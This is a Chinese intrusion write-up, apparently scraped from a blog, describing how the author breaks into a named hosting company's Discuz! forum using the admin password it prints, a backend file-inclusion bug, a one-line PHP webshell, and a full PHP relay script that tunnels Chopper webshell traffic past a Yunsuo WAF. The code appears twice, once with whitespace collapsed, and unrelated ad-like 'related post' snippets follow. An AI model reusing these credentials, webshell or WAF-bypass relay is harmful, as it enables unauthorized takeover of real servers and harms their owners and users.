过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)
直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer
进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可怜的用户数量来看,未打补丁的可能性比较大,那就尝试getshell吧,参考WooYun: Discuz3.2后台文件包含漏洞可后台拿shell具体操作过程就不啰嗦了,这里面有个小细节,一定要把服务器具体IP添加到本地host里面去,否则云锁waf会拦截的(至于怎么获得具体IP,最简单的是发送邮件测试)通过后台“文件检验”功能,我们能清楚的看到一句话文件成功生成了
我们浏览器访问看看
被云锁waf拦截了,估计菜刀肯定也连不了
果不其然,也被拦了,乌云zone翻了下前辈们的经验之谈,终于突破了,重点请往下看1、变形一句话
$_REQUEST['a']($_REQUEST['b']);
?>
1
2
3
$_REQUEST['a']($_REQUEST['b']);
?>
按上面getshell的方法重新将一句话写入根目录,得访问地址http://bbs.sudu.cn/help.php测试一下http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();
2、新建shell.php,填入菜刀中转脚本
$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址
$poststr='';
$i=0;
foreach($_POST as $k=>$v)
{
if(strstr($v, "base64_decode"))
{
$v=str_replace("base64_decode(","",$v);
$v=str_replace("))",")",$v);
}
else
{
if($k==="z0")
$v=base64_decode($v);
}
$pp=$k."=".urlencode($v);
//echo($pp);
if($i!=0)
{
$poststr=$poststr."&".$pp;
}
else
{
$poststr=$pp;
}
$i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$target="http://bbs.sudu.cn/help.php";//这个就是前面那个一句话的地址
$poststr='';
$i=0;
foreach($_POSTas$k=>$v)
{
if(strstr($v,"base64_decode"))
{
$v=str_replace("base64_decode(","",$v);
$v=str_replace("))",")",$v);
}
else
{
if($k==="z0")
$v=base64_decode($v);
}
$pp=$k."=".urlencode($v);
//echo($pp);
if($i!=0)
{
$poststr=$poststr."&".$pp;
}
else
{
$poststr=$pp;
}
$i=$i+1;
}
$ch=curl_init();
$curl_url=$target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch,CURLOPT_URL,$curl_url);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$poststr);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$result=curl_exec($ch);
curl_close($ch);
echo$result;
?>
3、本地搭建php环境,将中转脚本置于中,菜刀中连接,地址处填http://127.0.0.1:8004/shell.php?a=assert 密码处填b
成功突破,如图
过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)相关推荐
- 华夏名网:云主机的高性能和低价格可以兼得
2012年对于中国云主机来说犹如蛟龙飞腾直上,从亚马逊.阿里.盛大到万网.华夏名网及其它中小服务商,纷纷发布云计算主机产品,一派欣欣向荣,非常热闹,但参差不齐让用户眼花缭乱. 在我们普通人看来云计算似 ...
- 华夏名网十周年盛大感恩优惠活动
不知不觉中,华夏名网(www.sudu.cn)已经走过了十年.回首往昔,历历在目. 2002年,华夏名网正式成立,成为中国首批基础服务商家之一; 2004年,成为西部首家提供vps主机的服务商;200 ...
- 从华夏名网的营销到中国IDC行业的诚信
中国的IDC行业有诚信吗?这个问题我不置可否,请大家一边看一边思考.其实可能大家不看都已经有自己的答案,因为略有些经验的站长都经历过以下这些事情: 1.NND的空间都没几个人访问,就被告知资源超载,整 ...
- 11月初中国域名商解析量TOP13:华夏名网榜尾
IDC评述网(idcps.com)11月06日报道:根据DailyChanges公布的实时数据显示,截止至2015年11月02日,国内域名解析市场基本稳定,前十三强域名商排名与上期10月27日一致.其 ...
- 华夏名网虚拟主机如何导入mysql/mssql数据库,怎样自已导入数据到华夏名网数据库
华夏名网虚拟主机如何导入mysql/mssql数据库,怎样自已导入数据到华夏名网数据库 华夏名网代理客服losoon经常帮用户导数据和数据库,现总结一点经验,为更多的华夏名网用户提供方便,如何自已导入 ...
- 华夏名网Discuz虚拟主机论坛空间推荐
华夏名网第7代Discuz虚拟主机 <- 利用 Discuz! 站长能够在最短的时间内,花费最低的费用,采用最少的人力,架设一个性能优异.功能全面.安全稳定的社区论坛平台.华夏名网Linux主机 ...
- 为什么华夏名网的主机搭建的wordpress博客申请了SSL证书并安装really-simple-ssl不成功导致网站内页不能正常显示?
为什么华夏名网的主机搭建的wordpress博客申请了SSL证书并安装really-simple-ssl不成功导致网站内页不能正常显示? 我的博客是华夏名网的虚拟机搭建的wordpress博客申请了S ...
- 华夏mysql新建数据库_华夏名网虚拟主机不通过phpMyAdmin,将.sql备份导入MySQL数据库的方法...
将.SQL数据库备份文件导入MYSQL数据库 1.登录 "会员中心"->"产品管理"->"我的主机"->"管理& ...
- [快讯]爱名网云主机机房故障2天 上万站长网站无法访问
IDC评述网(idcps.com)05月05日报道:据大量网友反馈,域名注册与中介交易商"爱名网"于5月3日开始,云主机服务器所在机房电源出现紧急故障,导致很多主机用户的网站无法访 ...
最新文章
- 用户名字符串和密码字符串登录验证
- java 和equals_java中的==和equals()
- 新晋小白怎样才能做好seo优化
- python 中给文件加锁——fcntl模块
- python主要用于系统编程_一文带你了解python是什么?能做什么?为什么(附赠40G项目实战+绝版电子书)...
- 魔兽世界美服部落人数最多服务器,魔兽世界全球服务器最新人口普查,其实并没有你想象的那么少...
- hashmap7源码浅析及与hashmap8的比较
- 了解华为HCIP认证
- xp大容量u盘补丁_老电脑上大硬盘补丁
- Java程序开发工具 JCreator
- 在手机上共享屏幕,更专业的远程协助软件
- PCI-E x1/x4/x8/x16四种插槽区别是什么?具体有什么作用?
- Photoshop之通道抠图,适用于扣人像,树叶等细微抠图
- 标准误 Standard error 简单解释
- java对excel进行加密_用poi-3.6-20091214.jar 实现java给excel资料加密
- 目前最新android处理器排行榜,2016上半年安卓手机处理器排行:骁龙820无意外夺冠...
- spark实践-淘宝双十一数据分析与预测
- java 上传文件-生成文件首页缩略图 生成pdf 抓取图片
- android 源码下载
- 密室逃脱1深红色房间
热门文章
- 梦幻西游进入游戏显示服务器程序停止工作,Windows7系统提示“梦幻西游已停止工作”如何解决...
- 暴风影音遭攻击:六省区电信网络大瘫痪
- 织梦php模板安装教程,新手必读:原版织梦模板DEDECMS整站源码通用安装教程
- LOL班德尔城服务器位置,英雄联盟世界地图符文之地上线 找不到班德尔城竟然是官方玩笑?...
- 数据时代,为大家介绍四种非常好用的 app 数据分析 工具
- matlab模拟晶粒生长,matlab模拟晶粒长大?
- 华硕fx53vd 键盘_华硕FX53VD怎么保存BIOS设置?麻烦具体说一下。
- KV数据库是怎样支持SQL语句的
- 综合理解CFS、CTFT、S;DFS、DTFT、DFT、Z
- 水位尺读数识别 python_一种基于人工智能识别水尺水位的方法与流程